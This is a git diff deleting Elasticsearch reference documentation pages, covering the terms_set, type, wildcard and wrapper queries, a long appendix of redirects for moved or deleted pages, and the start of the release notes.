-[[terms-set-query-ex-request-query]] -===== Example query - -The following search returns documents where the `programming_languages` field -contains at least two of the following terms: - -* `c++` -* `java` -* `php` - -The `minimum_should_match_field` is `required_matches`. This means the -number of matching terms required is `2`, the value of the `required_matches` -field. - -[source,console] ----- -GET /job-candidates/_search -{ - "query": { - "terms_set": { - "programming_languages": { - "terms": [ "c++", "java", "php" ], - "minimum_should_match_field": "required_matches" - } - } - } -} ----- - -[[terms-set-top-level-params]] -==== Top-level parameters for `terms_set` - -``:: -(Required, object) Field you wish to search. - -[[terms-set-field-params]] -==== Parameters for `` - -`terms`:: -+ --- -(Required, array of strings) Array of terms you wish to find in the provided -``. To return a document, a required number of terms must exactly match -the field values, including whitespace and capitalization. - -The required number of matching terms is defined in the -`minimum_should_match_field` or `minimum_should_match_script` parameter. --- - -`minimum_should_match_field`:: -(Optional, string) <> field containing the number of matching -terms required to return a document. - -`minimum_should_match_script`:: -+ --- -(Optional, string) Custom script containing the number of matching terms -required to return a document. - -For parameters and valid values, see <>. - -For an example query using the `minimum_should_match_script` parameter, see -<>. --- - -[[terms-set-query-notes]] -==== Notes - -[[terms-set-query-script]] -===== How to use the `minimum_should_match_script` parameter -You can use `minimum_should_match_script` to define the required number of -matching terms using a script. This is useful if you need to set the number of -required terms dynamically. - -[[terms-set-query-script-ex]] -====== Example query using `minimum_should_match_script` - -The following search returns documents where the `programming_languages` field -contains at least two of the following terms: - -* `c++` -* `java` -* `php` - -The `source` parameter of this query indicates: - -* The required number of terms to match cannot exceed `params.num_terms`, the -number of terms provided in the `terms` field. -* The required number of terms to match is `2`, the value of the -`required_matches` field. - -[source,console] ----- -GET /job-candidates/_search -{ - "query": { - "terms_set": { - "programming_languages": { - "terms": [ "c++", "java", "php" ], - "minimum_should_match_script": { - "source": "Math.min(params.num_terms, doc['required_matches'].value)" - }, - "boost": 1.0 - } - } - } -} ----- diff --git a/docs/reference/query-dsl/type-query.asciidoc b/docs/reference/query-dsl/type-query.asciidoc deleted file mode 100644 index f863a3dd0ee..00000000000 --- a/docs/reference/query-dsl/type-query.asciidoc +++ /dev/null @@ -1,18 +0,0 @@ -[[query-dsl-type-query]] -=== Type Query - -deprecated[7.0.0,Types and the `type` query are deprecated and in the process of being removed. See <>.] - -Filters documents matching the provided document / mapping type. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "type": { - "value": "_doc" - } - } -} --------------------------------------------------- diff --git a/docs/reference/query-dsl/wildcard-query.asciidoc b/docs/reference/query-dsl/wildcard-query.asciidoc deleted file mode 100644 index ae84c60abbc..00000000000 --- a/docs/reference/query-dsl/wildcard-query.asciidoc +++ /dev/null @@ -1,81 +0,0 @@ -[[query-dsl-wildcard-query]] -=== Wildcard query -++++ -Wildcard -++++ - -Returns documents that contain terms matching a wildcard pattern. - -A wildcard operator is a placeholder that matches one or more characters. For -example, the `*` wildcard operator matches zero or more characters. You can -combine wildcard operators with other characters to create a wildcard pattern. - -[[wildcard-query-ex-request]] -==== Example request - -The following search returns documents where the `user.id` field contains a term -that begins with `ki` and ends with `y`. These matching terms can include `kiy`, -`kity`, or `kimchy`. - -[source,console] ----- -GET /_search -{ - "query": { - "wildcard": { - "user.id": { - "value": "ki*y", - "boost": 1.0, - "rewrite": "constant_score" - } - } - } -} ----- - -[[wildcard-top-level-params]] -==== Top-level parameters for `wildcard` -``:: -(Required, object) Field you wish to search. - -[[wildcard-query-field-params]] -==== Parameters for `` -`value`:: -(Required, string) Wildcard pattern for terms you wish to find in the provided -``. -+ --- -This parameter supports two wildcard operators: - -* `?`, which matches any single character -* `*`, which can match zero or more characters, including an empty one - -WARNING: Avoid beginning patterns with `*` or `?`. This can increase -the iterations needed to find matching terms and slow search performance. --- - -`boost`:: -(Optional, float) Floating point number used to decrease or increase the -<> of a query. Defaults to `1.0`. -+ -You can use the `boost` parameter to adjust relevance scores for searches -containing two or more queries. -+ -Boost values are relative to the default value of `1.0`. A boost value between -`0` and `1.0` decreases the relevance score. A value greater than `1.0` -increases the relevance score. - -`rewrite`:: -(Optional, string) Method used to rewrite the query. For valid values and more information, see the -<>. - -`case_insensitive`:: -(Optional, Boolean) allows case insensitive matching of the -pattern with the indexed field values when set to true. Default is false which means -the case sensitivity of matching depends on the underlying field's mapping. - -[[wildcard-query-notes]] -==== Notes -===== Allow expensive queries -Wildcard queries will not be executed if <> -is set to false. diff --git a/docs/reference/query-dsl/wrapper-query.asciidoc b/docs/reference/query-dsl/wrapper-query.asciidoc deleted file mode 100644 index b8b9626202e..00000000000 --- a/docs/reference/query-dsl/wrapper-query.asciidoc +++ /dev/null @@ -1,26 +0,0 @@ -[[query-dsl-wrapper-query]] -=== Wrapper query -++++ -Wrapper -++++ - -A query that accepts any other query as base64 encoded string. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "wrapper": { - "query": "eyJ0ZXJtIiA6IHsgInVzZXIuaWQiIDogImtpbWNoeSIgfX0=" <1> - } - } -} --------------------------------------------------- - -<1> Base64 encoded string: `{"term" : { "user.id" : "kimchy" }}` - -This query is more useful in the context of the Java high-level REST client or -transport client to also accept queries as json formatted string. -In these cases queries can be specified as a json or yaml formatted string or -as a query builder (which is a available in the Java high-level REST client). \ No newline at end of file diff --git a/docs/reference/redirects.asciidoc b/docs/reference/redirects.asciidoc deleted file mode 100644 index aa4dd7194e8..00000000000 --- a/docs/reference/redirects.asciidoc +++ /dev/null @@ -1,1325 +0,0 @@ -["appendix",role="exclude",id="redirects"] -= Deleted pages - -The following pages have moved or been deleted. - -[role="exclude",id="node.name"] -=== Node name setting - -See <>. - -[role="exclude",id="cluster.name"] -=== Cluster name setting - -See <>. - -[role="exclude",id="heap-size"] -=== Heap size settings - -See <>. - -[role="exclude",id="ccr-remedy-follower-index"] -=== Leader index retaining operations for replication - -See <>. - -[role="exclude",id="ccr-leader-not-replicating"] -=== Remedying a follower that has fallen behind - -See <>. - -[role="exclude",id="remote-reovery"] -=== Remote recovery process - -See <>. - -[role="exclude",id="ccr-requirements"] -=== Leader index requirements - -See <>. - -[role="exclude",id="ccr-overview"] -=== Cross-cluster replication overview - -See <>. - -[role="exclude",id="indices-upgrade"] -=== Upgrade API - -The `_upgrade` API is no longer useful and will be removed. Instead, see -<>. - -[role="exclude",id="mapping-parent-field"] -=== `_parent` field - -The `_parent` field has been removed in favour of the <>. - -[role="exclude",id="indices-warmers"] -=== Warmers - -Warmers have been removed. There have been significant improvements to the -index that make warmers not necessary anymore. - -[role="exclude",id="xpack-commands"] -=== X-Pack commands - -See <>. - -[role="exclude",id="xpack-api"] -=== X-Pack APIs - -{es} {xpack} APIs are now documented in <>. - -[role="exclude",id="ml-calendar-resource"]] -=== Calendar resources - -See <> and -{ml-docs}/ml-calendars.html[Calendars and scheduled events]. - -[role="exclude",id="ml-filter-resource"] -=== Filter resources - -See <> and -{ml-docs}/ml-rules.html[Machine learning custom rules]. - -[role="exclude",id="ml-event-resource"] -=== Scheduled event resources - -See <> and -{ml-docs}/ml-calendars.html[Calendars and scheduled events]. - -[role="exclude",id="index-apis"] -=== Index APIs -{es} index APIs are now documented in <>. - -[role="exclude",id="search-request-docvalue-fields"] -=== Doc value fields parameter for request body search API -See <>. - -[role="exclude",id="search-request-explain"] -=== Explain parameter for request body search API -See <>. - -[role="exclude",id="search-request-collapse"] -=== Collapse parameter for request body search API - -See <>. - -[role="exclude",id="search-request-from-size"] -=== From and size parameters for request body search API -See <>. - -[role="exclude",id="search-request-highlighting"] -=== Highlight parameter for request body search API -See <>. - -[role="exclude",id="search-request-index-boost"] -=== Index boost parameter for request body search API -See <>. - -[role="exclude",id="search-request-inner-hits"] -=== Inner hits parameter for request body search API -See <>. - -[role="exclude",id="search-request-min-score"] -=== Minimum score parameter for request body search API -See <>. - -[role="exclude",id="search-request-named-queries-and-filters"] -=== Named query parameter for request body search API -See <>. - -[role="exclude",id="search-request-post-filter"] -=== Post filter parameter for request body search API -See <>. - -[role="exclude",id="search-request-preference"] -=== Preference parameter for request body search API -See <>. - -[role="exclude",id="search-request-query"] -=== Query parameter for request body search API -See <>. - -[role="exclude",id="search-request-rescore"] -=== Rescoring parameter for request body search API -See <>. - -[role="exclude",id="search-request-script-fields"] -=== Script fields parameter for request body search API -See <>. - -[role="exclude",id="search-request-scroll"] -=== Scroll parameter for request body search API -See <>. - -[role="exclude",id="search-request-search-after"] -=== Search after parameter for request body search API -See <>. - -[role="exclude",id="search-request-search-type"] -=== Search type parameter for request body search API -See <>. - -[role="exclude",id="search-request-seq-no-primary-term"] -=== Sequence numbers and primary terms parameter for request body search API -See <>. - -[role="exclude",id="search-request-sort"] -=== Sort parameter for request body search API -See <>. - -[role="exclude",id="search-request-source-filtering"] -=== Source filtering parameter for request body search API - -See <>. - -[role="exclude",id="search-request-stored-fields"] -=== Stored fields parameter for request body search API -See <>. - -[role="exclude",id="search-request-track-total-hits"] -=== Track total hits parameter for request body search API -See <>. - -[role="exclude",id="search-request-version"] -=== Version parameter for request body search API -See <>. - -[role="exclude",id="search-suggesters-term"] -=== Term suggester -See <>. - -[role="exclude",id="search-suggesters-phrase"] -=== Phrase suggester -See <>. - -[role="exclude",id="search-suggesters-completion"] -=== Completion suggester -See <>. - -[role="exclude",id="suggester-context"] -=== Context suggester -See <>. - -[role="exclude",id="returning-suggesters-type"] -=== Return suggester type -See <>. - -[role="exclude",id="search-profile-queries"] -=== Profiling queries -See <>. - -[role="exclude",id="search-profile-aggregations"] -=== Profiling aggregations -See <>. - -[role="exclude",id="search-profile-considerations"] -=== Profiling considerations -See <>. - -[role="exclude",id="_explain_analyze"] -=== Explain analyze API -See <>. - -[role="exclude",id="indices-synced-flush"] -=== Synced flush API -See <>. - -[role="exclude",id="_repositories"] -=== Snapshot repositories -See <>. - -[role="exclude",id="_snapshot"] -=== Snapshot -See <>. - -[role="exclude",id="getting-started-explore"] -=== Exploring your cluster -See <>. - -[role="exclude",id="getting-started-cluster-health"] -=== Cluster health -See <>. - -[role="exclude", id="getting-started-list-indices"] -=== List all indices -See <>. - -[role="exclude", id="getting-started-create-index"] -=== Create an index -See <>. - -[role="exclude", id="getting-started-query-document"] -=== Index and query a document -See <>. - -[role="exclude", id="getting-started-delete-index"] -=== Delete an index -See <>. - -[role="exclude", id="getting-started-modify-data"] -== Modifying your data -See <>. - -[role="exclude", id="indexing-replacing-documents"] -=== Indexing/replacing documents -See <>. - -[role="exclude", id="getting-started-explore-data"] -=== Exploring your data -See <>. - -[role="exclude", id="getting-started-search-API"] -=== Search API -See <>. - -[role="exclude", id="getting-started-conclusion"] -=== Conclusion -See <>. - -[role="exclude",id="ccs-reduction"] -=== {ccs-cap} reduction -See <>. - -[role="exclude",id="administer-elasticsearch"] -=== Administering {es} -See <>. - -[role="exclude",id="slm-api"] -=== Snapshot lifecycle management API -See <>. - -[role="exclude",id="delete-data-frame-transform"] -=== Delete {transforms} API - -See <>. - -[role="exclude",id="get-data-frame-transform-stats"] -=== Get {transform} statistics API - -See <>. - -[role="exclude",id="get-data-frame-transform"] -=== Get {transforms} API - -See <>. - -[role="exclude",id="preview-data-frame-transform"] -=== Preview {transforms} API - -See <>. - -[role="exclude",id="put-data-frame-transform"] -=== Create {transforms} API - -See <>. - -[role="exclude",id="start-data-frame-transform"] -=== Start {transforms} API - -See <>. - -[role="exclude",id="stop-data-frame-transform"] -=== Stop {transforms} API - -See <>. - -[role="exclude",id="update-data-frame-transform"] -=== Update {transforms} API - -See <>. - -[role="exclude",id="data-frame-apis"] -=== {transform-cap} APIs - -See <>. - -[role="exclude",id="data-frame-transform-resource"] -=== {transform-cap} resources - -See <>. - -[role="exclude",id="data-frame-transform-dest"] -=== Dest objects - -See <>. - -[role="exclude",id="data-frame-transform-source"] -==== Source objects - -See <>. - -[role="exclude",id="data-frame-transform-pivot"] -==== Pivot objects - -See <>. - -[role="exclude",id="configuring-monitoring"] -=== Configuring monitoring - -See <>. - -[role="exclude",id="es-monitoring"] -=== Monitoring {es} - -See <>. - -[role="exclude",id="docker-cli-run"] -=== Docker Run - -See <>. - -[role="exclude",id="auditing"] -=== Audit logging - -See <>. - -[role="exclude",id="analysis-compound-word-tokenfilter"] -=== Compound word token filters - -See <> and -<>. - -[role="exclude",id="configuring-native-realm"] -=== Configuring a native realm - -See <>. - -[role="exclude",id="native-settings"] -==== Native realm settings - -See <>. - -[role="exclude",id="configuring-saml-realm"] -=== Configuring a SAML realm - -See <>. - -[role="exclude",id="saml-settings"] -==== SAML realm settings - -See <>. - -[role="exclude",id="_saml_realm_signing_settings"] -==== SAML realm signing settings - -See <>. - -[role="exclude",id="_saml_realm_encryption_settings"] -==== SAML realm encryption settings - -See <>. - -[role="exclude",id="_saml_realm_ssl_settings"] -==== SAML realm SSL settings - -See <>. - -[role="exclude",id="configuring-file-realm"] -=== Configuring a file realm - -See <>. - -[role="exclude",id="ldap-user-search"] -=== User search mode and user DN templates mode - -See <>. - -[role="exclude",id="configuring-ldap-realm"] -=== Configuring an LDAP realm - -See <>. - -[role="exclude",id="ldap-settings"] -=== LDAP realm settings - -See <>. - -[role="exclude",id="ldap-ssl"] -=== Setting up SSL between Elasticsearch and LDAP - -See <>. - -[role="exclude",id="configuring-kerberos-realm"] -=== Configuring a Kerberos realm - -See <>. - -[role="exclude",id="beats"] -=== Beats and Security - -See: - -* {auditbeat-ref}/securing-auditbeat.html[{auditbeat}] -* {filebeat-ref}/securing-filebeat.html[{filebeat}] -* {heartbeat-ref}/securing-heartbeat.html[{heartbeat}] -* {metricbeat-ref}/securing-metricbeat.html[{metricbeat}] -* {packetbeat-ref}/securing-packetbeat.html[{packetbeat}] -* {winlogbeat-ref}/securing-winlogbeat.html[{winlogbeat}] - -[role="exclude",id="configuring-pki-realm"] -=== Configuring a PKI realm - -See <>. - -[role="exclude",id="pki-settings"] -==== PKI realm settings - -See <>. - -[role="exclude",id="configuring-ad-realm"] -=== Configuring an Active Directory realm - -See <>. - -[role="exclude",id="ad-settings"] -=== Active Directory realm settings - -See <>. - -[role="exclude",id="mapping-roles-ad"] -=== Mapping Active Directory users and groups to roles - -See <>. - -[role="exclude",id="how-security-works"] -=== How security works - -See <>. - -[role="exclude",id="rollup-job-config"] -=== Rollup job configuration - -See <>. - -[role="exclude",id="transform-resource"] -=== {transform-cap} resources - -This page was deleted. -See <>, <>, <>, -<>. - -[role="exclude",id="ml-job-resource"] -=== Job resources - -This page was deleted. -[[ml-analysisconfig]] -See the details in -[[ml-apimodelplotconfig]] -<>, <>, and <>. - -[role="exclude",id="ml-datafeed-resource"] -=== {dfeed-cap} resources - -This page was deleted. -[[ml-datafeed-chunking-config]] -See the details in <>, <>, -[[ml-datafeed-delayed-data-check-config]] -<>, -[[ml-datafeed-counts]] -<>. - -[role="exclude",id="ml-jobstats"] -=== Job statistics - -This -[[ml-datacounts]] -page -[[ml-modelsizestats]] -was -[[ml-forecastsstats]] -deleted. -[[ml-timingstats]] -See -[[ml-stats-node]] -the details in <>. - -[role="exclude",id="ml-snapshot-resource"] -=== Model snapshot resources - -This page was deleted. -[[ml-snapshot-stats]] -See <> and <>. - -[role="exclude",id="ml-dfanalytics-resources"] -=== {dfanalytics-cap} job resources - -This page was deleted. -See <>. - -[role="exclude",id="ml-dfa-analysis-objects"] -=== Analysis configuration objects - -This page was deleted. -See <>. - -[role="exclude",id="put-inference"] -=== Create trained model API - -See <>. - -[role="exclude",id="get-inference-stats"] -=== Get trained model statistics API - -See <>. - -[role="exclude",id="get-inference"] -=== Get trained model API - -See <>. - -[role="exclude",id="delete-inference"] -=== Delete trained model API - -See <>. - -[role="exclude",id="data-frames-settings"] -=== {transforms-cap} settings in Elasticsearch - -See <>. - -[role="exclude",id="general-data-frames-settings"] -==== General {transforms} settings - -See <>. - -[role="exclude",id="ml-results-resource"] -=== Results resources - -This page was deleted. -[[ml-results-buckets]] -See <>, -[[ml-results-bucket-influencers]] -<>, -[[ml-results-influencers]] -<>, -[[ml-results-records]] -<>, -[[ml-results-categories]] -<>, and -[[ml-results-overall-buckets]] -<>. - -[role="exclude",id="modules-snapshots"] -=== Snapshot module - -See <>. - -[role="exclude",id="_repository_plugins"] -==== Repository plugins - -See <>. - -[role="exclude",id="_changing_index_settings_during_restore"] -==== Change index settings during restore - -See <>. - -[role="exclude",id="restore-snapshot"] -=== Restore snapshot - -See <>. - -[role="exclude",id="snapshots-repositories"] -=== Snapshot repositories - -See <>. - -[role="exclude",id="slm-api-delete"] -=== {slm-init} delete policy API - -See <>. - -[role="exclude",id="slm-api-execute"] -=== {slm-init} execute lifecycle API - -See <>. - -[role="exclude",id="slm-api-execute-policy"] -=== {slm-init} execute lifecycle API - -See <>. - -[role="exclude",id="slm-api-get"] -=== {slm-init} get policy API - -See <>. - -[role="exclude",id="slm-get-stats"] -=== {slm-init} get stats API - -See <>. - -[role="exclude",id="slm-get-status"] -=== {slm-init} status API - -See <>. - -[role="exclude",id="slm-api-put"] -=== {slm-init} put policy API - -See <>. - -[role="exclude",id="slm-start"] -=== Start {slm} API - -See <>. - -[role="exclude",id="slm-stop"] -=== Stop {slm} API - -See <>. - -[role="exclude",id="ccs-works"] -=== How {ccs} works - -See <> and <>. - -[role="exclude",id="modules-indices"] -=== Indices module - -See: - -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -[role="exclude",id="cat-transform"] -=== cat transform API - -See <>. - -[role="exclude",id="testing"] -=== Testing - -This page was deleted. -Information about the Java testing framework was removed -({es-issue}55257[#55257]) from the {es} Reference -because it was out of date and erroneously implied that it should be used by application developers. -There is an issue ({es-issue}55258[#55258]) -for providing general testing guidance for applications that communicate with {es}. - -[role="exclude",id="testing-framework"] -=== Java testing framework - -This page was deleted. -Information about the Java testing framework was removed -({es-issue}55257[55257]) from the {es} Reference because it was out of date and -erroneously implied that it should be used by application developers. - -There is an issue ({es-issue}55258[#55258]) for providing general testing -guidance for applications that communicate with {es}. - - -[role="exclude",id="why-randomized-testing"] -=== Why randomized testing? - -This page was deleted. -Information about the Java testing framework was removed -({es-issue}55257[55257]) from the {es} Reference -because it was out of date and erroneously implied that it should be used by application developers. -There is an issue ({es-issue}[#55258]) -for providing general testing guidance for applications that communicate with {es}. - - -[role="exclude",id="using-elasticsearch-test-classes"] -=== Using the {es} test classes - -This page was deleted. -Information about the Java testing framework was removed -({es-issue}55257[55257]) from the {es} Reference -because it was out of date and erroneously implied that it should be used by application developers. -There is an issue ({es-issue}55258[#55258]) -for providing general testing guidance for applications that communicate with {es}. - - -[role="exclude",id="unit-tests"] -=== Unit tests - -This page was deleted. -Information about the Java testing framework was removed -({es-issue}55257[55257]) from the {es} Reference -because it was out of date and erroneously implied that it should be used by application developers. -There is an issue ({es-issue}55258[#55258]) -for providing general testing guidance for applications that communicate with {es}. - - -[role="exclude",id="integration-tests"] -=== Integration tests - -This page was deleted. -Information about the Java testing framework was removed -({es-issue}55257[55257]) from the {es} Reference -because it was out of date and erroneously implied that it should be used by application developers. -There is an issue ({es-issue}55258[#55258]) -for providing general testing guidance for applications that communicate with {es}. - - -[role="exclude",id="number-of-shards"] -==== Number of shards - -This section was deleted. - -[role="exclude",id="helper-methods"] -==== Generic helper methods - -This section was deleted. - -[role="exclude",id="test-cluster-methods"] -==== Test cluster methods - -This section was deleted. - -[role="exclude",id="changing-node-settings"] -==== Changing node settings - -This section was deleted. - -[role="exclude",id="accessing-clients"] -==== Accessing clients - -This section was deleted. - -[role="exclude",id="scoping"] -==== Scoping - -This section was deleted. - -[role="exclude",id="changing-node-configuration"] -==== Changing plugins via configuration - -This section was deleted. - -[role="exclude",id="randomized-testing"] -=== Randomized testing - -This page was deleted. - -[role="exclude",id="generating-random-data"] -==== Generating random data - -This section was deleted. - -[role="exclude",id="assertions"] -=== Assertions - -This page was deleted. - -[role="exclude",id="_actions"] -=== {ilm-init} actions - -See <>. - -[role="exclude",id="ilm-allocate-action"] -==== Allocate action - -See <>. - -[role="exclude",id="ilm-delete-action"] -==== Delete action - -See <>. - -[role="exclude",id="ilm-forcemerge-action"] -==== Force merge action - -See <>. - -[role="exclude",id="ilm-freeze-action"] -==== Freeze action - -See <>. - -[role="exclude",id="ilm-migrate-action"] -==== Migrate action - -See <>. - -[role="exclude",id="ilm-readonly-action"] -==== Read only action - -See <>. - -[role="exclude",id="ilm-rollover-action"] -==== Rollover action - -See <>. - -[role="exclude",id="ilm-searchable-snapshot-action"] -==== Searchable snapshot action - -See <>. - -[role="exclude",id="ilm-set-priority-action"] -==== Set priority action - -See <>. - -[role="exclude",id="ilm-shrink-action"] -==== Shrink action - -See <>. - -[role="exclude",id="ilm-unfollow-action"] -==== Unfollow action - -See <>. - -[role="exclude",id="ilm-wait-for-snapshot-action"] -==== Wait for snapshot action - -See <>. - -[role="exclude",id="ilm-policy-definition"] -=== {ilm-init} policy definition - -See <>. - -[role="exclude",id="search-uri-request"] -=== URI search - -See <>. - -[role="exclude",id="modules-gateway-dangling-indices"] -=== Dangling indices - -See <>. - -[role="exclude",id="shards-allocation"] -=== Cluster-level shard allocation - -See <>. - -[role="exclude",id="disk-allocator"] -=== Disk-based shard allocation - -See <>. - -[role="exclude",id="allocation-awareness"] -=== Shard allocation awareness - -See <>. - -[role="exclude",id="allocation-filtering"] -=== Cluster-level shard allocation filtering - -See <>. - -[role="exclude",id="misc-cluster"] -=== Miscellaneous cluster settings - -See <>. - -[role="exclude",id="modules"] -=== Modules - -This page has been removed. - -See <> for settings information: - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -For other information, see: - -* <> -* <> -* <> -* <> -* <> - -[role="exclude",id="modules-discovery-adding-removing-nodes"] -=== Adding and removing nodes - -See <>. - -[role="exclude",id="_timing"] -=== Timing - -See <>. - -[role="exclude",id="_installation"] -=== Installation - -See <>. - -[role="exclude",id="mapping-ttl-field"] -=== `_ttl` mappings - -The `_ttl` mappings have been removed. As a replacement for `_ttl` -mappings, we recommend using <> to create -time-based indices. - -[role="exclude",id="setup-service"] -=== Running as a service on Linux - -See <>. - -[role="exclude",id="modules-scripting-painless-syntax"] -=== Painless syntax - -See {painless}/painless-lang-spec.html[Painless language specification]. - -[role="exclude",id="using-policies-rollover"] -=== Using policies to manage index rollover - -See <>. - -[role="exclude",id="_applying_a_policy_to_our_index"] -=== Applying a policy to our index - -See <>. - -[role="exclude",id="setup-dir-layout"] -=== Directory layout - -See <>. - -[role="exclude",id="scan-scroll"] -=== Scan and scroll - -See <>. - -[role="exclude",id="mapping-dynamic-mapping"] -=== Dynamic mapping - -See <>. - -[role="exclude",id="applying-policy-to-template"] -=== Applying a policy to an index template - -See <>. - -[role="exclude",id="indices-status"] -=== Index status API - -The index `_status` API has been replaced with the <> and <> APIs. - -[role="exclude",id="search-facets"] -=== Search facets - -See <>. - -[role="exclude",id="_executing_searches"] -=== Executing searches - -See <>. - -[role="exclude",id="mapping-root-object-type"] -=== Mapping root object type - -Mapping types have been removed. See <>. - -[role="exclude",id="query-dsl-filters"] -=== Query DSL filters - -See <>. - -[role="exclude",id="esms"] -=== {esms} - -We have stopped adding new customers to our {esms}. - -If you are interested in similar capabilities, contact -https://support.elastic.co[Elastic Support] to discuss available options. - -[role="exclude",id="ilm-with-existing-periodic-indices"] -=== Manage existing periodic indices with {ilm-init} - -See <>. - -[role="exclude",id="ilm-reindexing-into-rollover"] -=== Reindexing via {ilm-init} - -See <>. - -[role="exclude",id="analysis-pathhierarchy-tokenizer-examples"] -=== Path hierarchy tokenizer examples - -See <>. - -[role="exclude",id="modules-tribe"] -=== Tribe node - -Tribe node functionality has been removed in favor of {ccs}. See -<>. - -[role="exclude",id="release-highlights-7.0.0"] -=== Release highlights - -See <>. - -[role="exclude",id="sql-settings"] -=== SQL access settings in Elasticsearch - -The `xpack.sql.enabled` setting has been deprecated. SQL access is always enabled. - -[role="exclude",id="indices-templates"] -=== Index templates [[getting]] - -See <>. - -[role="exclude",id="indices-template-exists"] -=== Index template exists (legacy) - -See <>. - -[role="exclude",id="run-a-search"] -=== Run a search - -See <>. - -[role="exclude",id="how-highlighters-work-internally"] -=== How highlighters work internally - -See <>. - -[role="exclude",id="eql-search"] -=== Run an EQL search - -See <>. - -[role="exclude",id="eql-limitations"] -=== EQL limitations - -See <>. - -[role="exclude",id="eql-requirements"] -=== EQL requirements - -See <>. - -[role="exclude",id="search-request-body"] -=== Request body search - -This page has been removed. - -For search API reference documentation, see <>. - -For search examples, see <>. - -[role="exclude",id="request-body-search-docvalue-fields"] -==== Doc value fields - -See <>. - -[role="exclude",id="_fast_check_for_any_matching_docs"] -==== Fast check for any matching docs - -See <>. - -[role="exclude",id="request-body-search-collapse"] -==== Field collapsing - -See <>. - -[role="exclude",id="request-body-search-from-size"] -==== From / size - -See <>. - -[role="exclude",id="request-body-search-highlighting"] -==== Highlighting - -See <>. - -[role="exclude",id="highlighter-internal-work"] -==== How highlighters work internally - -See <>. - -[role="exclude",id="request-body-search-index-boost"] -==== Index boost -See <>. - -[role="exclude",id="request-body-search-inner-hits"] -==== Inner hits -See <>. - -[role="exclude",id="request-body-search-min-score"] -==== `min_score` - -See the <> parameter. - -[role="exclude",id="request-body-search-queries-and-filters"] -==== Named queries - -See <>. - -[role="exclude",id="request-body-search-post-filter"] -==== Post filter - -See <>. - -[role="exclude",id="request-body-search-preference"] -==== Preference - -See <>. - -[role="exclude",id="request-body-search-rescore"] -==== Rescoring - -See <>. - -[role="exclude",id="request-body-search-script-fields"] -==== Script fields - -See <>. - -[role="exclude",id="request-body-search-scroll"] -==== Scroll - -See <>. - -[[_clear_scroll_api]] -==== Clear scroll API - -See <>. - -[[sliced-scroll]] -==== Sliced scroll - -See <>. - -[role="exclude",id="request-body-search-search-after"] -==== Search after - -See <>. - -[role="exclude",id="request-body-search-search-type"] -==== Search type - -See <>. - -[role="exclude",id="request-body-search-sort"] -==== Sort - -See <>. - -[role="exclude",id="request-body-search-source-filtering"] -==== Source filtering - -See <>. - -[role="exclude",id="request-body-search-stored-fields"] -==== Stored fields - -See <>. - -[role="exclude",id="request-body-search-track-total-hits"] -==== Track total hits - -See <>. - -[role="exclude",id="_notes_3"] -=== Joining queries notes - -See <>. - -[role="exclude",id="_notes_4"] -=== Percolate query notes - -See <>. - -[role="exclude",id="constant-keyword"] -=== Constant keyword field type - -See <>. - -[role="exclude",id="wildcard"] -=== Wildcard field type - -See <>. - -[role="exclude",id="searchable-snapshots-api-clear-cache"] -=== Clear cache API - -We have removed documentation for this API. This a low-level API used to clear -the searchable snapshot cache. We plan to remove or drastically change this API -as part of a future release. - -For other searchable snapshot APIs, see <>. - -[role="exclude",id="searchable-snapshots-api-stats"] -=== Searchable snapshot statistics API - -We have removed documentation for this API. This a low-level API used to get -information about searchable snapshot indices. We plan to remove or drastically -change this API as part of a future release. - -For other searchable snapshot APIs, see <>. - -[role="exclude",id="searchable-snapshots-repository-stats"] -=== Searchable snapshot repository statistics API - -We have removed documentation for this API. This a low-level API used to get -information about searchable snapshot indices. We plan to remove or drastically -change this API as part of a future release. - -For other searchable snapshot APIs, see <>. - -[role="exclude",id="point-in-time"] -=== Point in time API - -See <>. - -[role="exclude",id="avoid-oversharding"] -=== Avoid oversharding - -See <>. - -[role="exclude",id="_parameters_8"] -=== elasticsearch-croneval parameters - -See <>. - -[role="exclude",id="caching-heavy-aggregations"] -=== Caching heavy aggregations - -See <>. - -[role="exclude",id="returning-only-agg-results"] -=== Returning only aggregation results - -See <>. - -[role="exclude",id="agg-metadata"] -=== Aggregation metadata - -See <>. - -[role="exclude",id="returning-aggregation-type"] -=== Returning the type of the aggregation - -See <>. - -[role="exclude",id="indexing-aggregation-results"] -=== Indexing aggregation results with transforms - -See <>. - -[role="exclude",id="search-aggregations-matrix"] -=== Matrix aggregations - -See <>. - -[role="exclude",id="fielddata"] -=== `fielddata` mapping parameter - -See <>. diff --git a/docs/reference/release-notes.asciidoc b/docs/reference/release-notes.asciidoc deleted file mode 100644 index cc816a25b8f..00000000000 --- a/docs/reference/release-notes.asciidoc +++ /dev/null @@ -1,60 +0,0 @@ -[[es-release-notes]] -= Release notes - -[partintro] --- - -This section summarizes the changes in each release. - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - --- - -include::release-notes/7.10.asciidoc[] -include::release-notes/7.9.asciidoc[] -include::release-notes/7.8.asciidoc[] -include::release-notes/7.7.asciidoc[] -include::release-notes/7.6.asciidoc[] -include::release-notes/7.5.asciidoc[] -include::release-notes/7.4.asciidoc[] -include::release-notes/7.3.asciidoc[] -include::release-notes/7.2.asciidoc[] -include::release-notes/7.1.asciidoc[] -include::release-notes/7.0.asciidoc[] -include::release-notes/7.0.0-rc2.asciidoc[] -include::release-notes/7.0.0-rc1.asciidoc[] -include::release-notes/7.0.0-beta1.asciidoc[] -include::release-notes/7.0.0-alpha2.asciidoc[] -include::release-notes/7.0.0-alpha1.asciidoc[] diff --git a/docs/reference/release-notes/7.0.0-alpha1.asciidoc b/docs/reference/release-notes/7.0.0-alpha1.asciidoc deleted file mode 100644 index 6584025c34a..00000000000 --- a/docs/reference/release-notes/7.0.0-alpha1.asciidoc +++ /dev/null @@ -1,459 +0,0 @@ -[[release-notes-7.0.0-alpha1]] -== {es} version 7.0.0-alpha1 - -The changes listed below have been released for the first time in Elasticsearch 7.0.0-alpha1. - -[[breaking-7.0.0-alpha1]] -[discrete] -=== Breaking changes - -Aggregations:: -* Remove support for deprecated params._agg/_aggs for scripted metric aggregations {es-pull}32979[#32979] (issues: {es-issue}29328[#29328], {es-issue}31597[#31597]) -* Percentile/Ranks should return null 